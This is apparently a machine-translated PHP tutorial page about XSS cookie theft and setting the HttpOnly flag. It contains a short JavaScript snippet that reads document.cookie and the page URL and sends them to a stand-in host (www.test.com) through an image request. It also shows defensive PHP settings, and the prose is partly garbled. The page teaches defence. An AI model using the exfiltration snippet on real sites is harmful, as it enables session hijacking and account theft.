Needless to say, the concept of Or session hijacking, if it contains a lot of sensitive information (identity information, administrator information), etc., it's over. . .
The following js is used to obtain cookie information:
Copy code The code is as follows:
url=document.top.location.href;
cookie=document.cookie ;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
Generally, cookies are obtained from document objects. Now when browsers set cookies, they generally accept a parameter called HttpOnly, just like other parameters such as domain. Once this HttpOnly is set, you can set it in the document of the browser. The cookie is no longer visible in the object.
PHP settings HttpOnly:
Copy code The code is as follows:
//In php.ini, session.cookie_httponly = ture to enable global cookies The HttpOnly attribute
ini_set("session.cookie_httponly", 1);
//or the seventh parameter of setcookie() is set to true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
For PHP versions prior to PHP5.1 pass:
Copy code The code is as follows:
header("Set-Cookie: hidden=value; httpOnly");
Finally, HttpOnly is not a panacea!
http://www.bkjia.com/PHPjc/744327.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/744327.htmlTechArticleNeedless to say, the concept of xss is extremely harmful, which means that once your If an XSS vulnerability appears on a website, arbitrary JS code can be executed. The most terrifying thing is that attackers use JS to obtain...